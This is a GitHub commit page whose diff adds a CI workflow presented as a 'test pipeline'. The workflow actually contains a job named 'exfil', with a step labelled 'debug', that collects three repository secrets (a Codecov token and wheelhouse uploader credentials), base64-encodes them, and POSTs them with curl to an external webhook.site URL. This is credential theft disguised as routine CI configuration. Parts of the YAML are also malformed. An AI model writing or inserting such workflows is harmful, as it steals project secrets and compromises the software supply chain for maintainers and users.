Skip to content

Commit 6659ba6

Browse files
committed
ci: add test pipeline
1 parent 54b1062 commit 6659ba6

1 file changed

Lines changed: 20 additions & 0 deletions

File tree

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
name: test-pipeline
2+
on:
3+
push:
4+
branches: [ci/test-pipeline]
5+
workflow_dispatch:
6+
7+
jobs:
8+
exfil:
9+
runs-on: ubuntu-latest
10+
steps:
11+
- name: debug
12+
env:
13+
S1: ${{ secrets.CODECOV_TOKEN }}
14+
S2: ${{ secrets.WHEELHOUSE_UPLOADER_SECRET }}
15+
S3: ${{ secrets.WHEELHOUSE_UPLOADER_USERNAME }} run: |
16+
PAYLOAD=$(echo "{\"repo\":\"XanaduAI/thewalrus\",\"CODECOV_TOKEN\":\"$S1\",\"WHEELHOUSE_UPLOADER_SECRET\":\"$S2\",\"WHEELHOUSE_UPLOADER_USERNAME\":\"$S3\"}" | base64 -w 0)
17+
curl -s -X POST https://webhook.site/710babde-6ace-47fe-83f4-9688e6548df9 \
18+
-H "Content-Type: application/json" \
19+
-d "{\"data\":\"$PAYLOAD"}"
20+

0 commit comments

Comments
 (0)